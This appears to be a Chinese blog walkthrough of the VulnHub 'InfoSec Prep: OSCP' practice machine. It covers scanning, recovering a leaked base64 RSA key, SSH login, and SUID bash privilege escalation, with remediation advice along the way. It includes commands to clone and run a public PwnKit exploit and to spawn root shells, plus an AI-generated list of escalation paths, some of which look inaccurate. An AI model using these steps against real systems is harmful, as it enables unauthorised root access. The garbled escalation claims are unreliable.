当前位置：首页 > news >正文

InfoSec Prep: OSCP靶场渗透

news 来源：原创 2025/8/22 18:30:06

InfoSec Prep: OSCP
InfoSec Prep: OSCP ~ VulnHubInfoSec Prep: OSCP, made by FalconSpy. Download & walkthrough links are available.https://www.vulnhub.com/entry/infosec-prep-oscp,508/

1，将两台虚拟机网络连接都改为NAT模式

2，攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182，靶场IP192.168.23.224

3，对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.224

nmap --scripts=vlun 192.168.23.224 -v

(1) CSRF漏洞（跨站请求伪造）

风险描述
扫描器在多个路径发现无CSRF防护的表单（如搜索框、登录表单），攻击者可构造恶意链接诱骗用户提交请求，可能导致：

用户密码被修改
恶意内容发布（如文章、评论）
管理员权限被窃取（通过后台操作）

修复建议

为所有表单添加CSRF Token验证（WordPress默认支持，需检查主题/插件兼容性）。
使用nonce机制（WordPress函数wp_nonce_field）。
对关键操作（如密码修改）要求二次验证。

(2) 用户枚举风险

风险描述
发现用户名admin，攻击者可能针对此账户进行暴力破解。

修复建议

创建新管理员账户，删除或重命名admin账户。
限制登录尝试次数（如使用插件Limit Login Attempts Reloaded）。
启用双因素认证（如Google Authenticator）。

(3) 版本信息泄露

风险点

/readme.html泄露WordPress版本（5.4.2）。
遗留文件（如/wp-includes/images/rss.png）暴露旧版本痕迹。

修复建议

删除/readme.html及无用遗留文件。
更新WordPress至最新版本（当前最新为6.5+），修复已知漏洞。
隐藏版本号（在functions.php中添加：remove_action('wp_head', 'wp_generator');）。

3. 其他Web风险

后台暴露路径

/wp-login.php和/wp-admin/upgrade.php可直接访问。
建议：

限制后台访问IP（通过.htaccess或防火墙）。
修改后台登录路径（使用插件WPS Hide Login）。

robots.txt泄露

需检查robots.txt是否包含敏感路径（如备份目录、配置文件）。

4，访问80端口开放的http服务

然后枚举扫描其存在的子目录

dirsearch -u http://192.168.23.224 -x 403,404

http://192.168.23.224/robots.txt

http://192.168.23.224/secret.txt

该页面的乱码有base64编码的特征，解码就能得到内容

是一个RSA私钥，应该会在之后的横向移动环节用到

5，初始网页提示了只存在一个用户oscp

创建并且使用密钥登录之

vim is_rsa chmod 600 is_rsa

ssh -i is_rsa oscp@192.168.23.224

登录成功

6，信息收集一下

whoami

sudo -l

uname -a

查看所有具有suid权限的文件

find / -perm -u=s -type f 2>/dev/null

AI分析可能存在提权风险的SUID二进制文件及利用方法：

1. /usr/bin/bash

风险：若bash具有SUID权限，可通过bash -p尝试获取root shell。
验证方法：
/usr/bin/bash -p
若成功，将直接进入root权限的shell。
修复建议：移除bash的SUID位：
sudo chmod u-s /usr/bin/bash

2. /usr/bin/pkexec

风险：受CVE-2021-4034（PwnKit漏洞）影响，低版本可本地提权。
验证方法：
检查版本：
pkexec --version
若版本低于0.105-26ubuntu1.1（Ubuntu）或未打补丁，可尝试利用公开EXP。
利用步骤：
下载EXP并执行：
git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034
make
./cve-2021-4034
修复建议：更新系统或运行apt upgrade policykit-1.

3. /usr/bin/sudo

风险：CVE-2021-3156（Baron Samedit漏洞）允许本地用户获得root权限。
验证方法：
检查sudo版本：
sudo --version
若版本在1.8.2到1.8.31p2之间，可能存在风险。
利用步骤：
使用公开EXP（如https://github.com/blasty/CVE-2021-3156）。

4. /usr/lib/snapd/snap-confine

风险：历史漏洞如CVE-2021-44731（Ubuntu Snap提权）。
验证方法：
检查snapd版本：
snap --version
若版本低于2.54.3，可能存在漏洞。
修复建议：更新snapd：sudo apt update && sudo apt install snapd.

5. /usr/bin/mount 或 /usr/bin/umount

风险：若允许用户挂载敏感目录（如/etc），可能覆盖敏感文件。
利用条件：需允许非root用户挂载特定设备。
示例：
mount -o loop /dev/sda1 /mnt # 尝试挂载设备
若成功，可修改挂载目录中的文件。

6. /usr/bin/fusermount

风险：低版本存在CVE-2018-19824，允许非root用户挂载FUSE文件系统。
验证方法：
检查版本：
fusermount --version
若版本低于2.9.9，可能存在风险。

7. /usr/bin/chfn 或 /usr/bin/chsh

风险：若配置不当（如/etc/login.defs中CHFN_RESTRICT未设置），可能通过修改用户信息提权。
利用方法：
chfn -o root /etc/passwd # 尝试注入root权限
需要特定配置漏洞配合。

7，这里使用bash命令的suid提权方法

若二进制文件设置了 SUID 权限位（即 -rwsr-xr-x ），且未正确降权，攻击者可能利用它访问文件系统、提权或维持权限（例如作为 SUID 后门）。

在 Debian Stretch 及更早版本中，默认允许 Shell（如 bash）以 SUID 权限运行（无需额外参数即可保留特权）。

利用步骤

创建本地 SUID 副本
将系统的 bash 二进制文件复制到当前目录，并保留其 SUID 权限：
sudo install -m =xs $(which bash) .

install -m =xs：设置新文件的权限为 SUID（等效于 chmod u+s）。
$(which bash)：获取系统默认 bash 的绝对路径。

执行 SUID 二进制文件
运行复制的 bash 并附加 -p 参数以保留特权：
bash -p

-p 参数：启动特权模式（不重置 UID/EUID）。
若成功，将进入 root shell（通过 id -u 验证 UID 是否为 0）。

成功提权成为root用户

相关文章：